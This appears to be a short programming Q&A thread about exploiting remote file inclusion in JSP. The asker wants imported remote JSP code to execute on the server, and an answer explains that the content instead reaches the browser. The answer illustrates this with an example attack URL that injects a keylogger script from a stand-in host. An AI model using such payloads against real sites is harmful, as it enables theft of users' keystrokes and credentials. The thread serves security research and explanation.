# import and execute jsp code from another server

Tags: jsp, security, glassfish

I'm working on providing a poc for code execution on JSP usign an RFI.

I'm able to import jsp code from another server but the code is displayed and not executed.

```
<c:import url ="http://localhost:8082/bad.jsp"/>
```

Any ways to make this code executable ?

Thanks.

Answer (score -1):

Remote file inclusion in JSP is not similar to PHP. When you do
`<c:import url="http://maliciouscode"/>`

This will be included+executed in user's browser, not in server. So RFI in JSP will be like:

`http://localhost/vulnerable.jsp?file=http://xsskeylogger.com/keylogger.js`

(which vulnerable.jsp does import whatever is in `file` param)

So vulnerable code will include the keylogger javascript in user's browser. So you can say, sort of, that RFI in JSP is more like reflected XSS

Comment: so achieving code execution on server side is not possible using RFI in JSP ?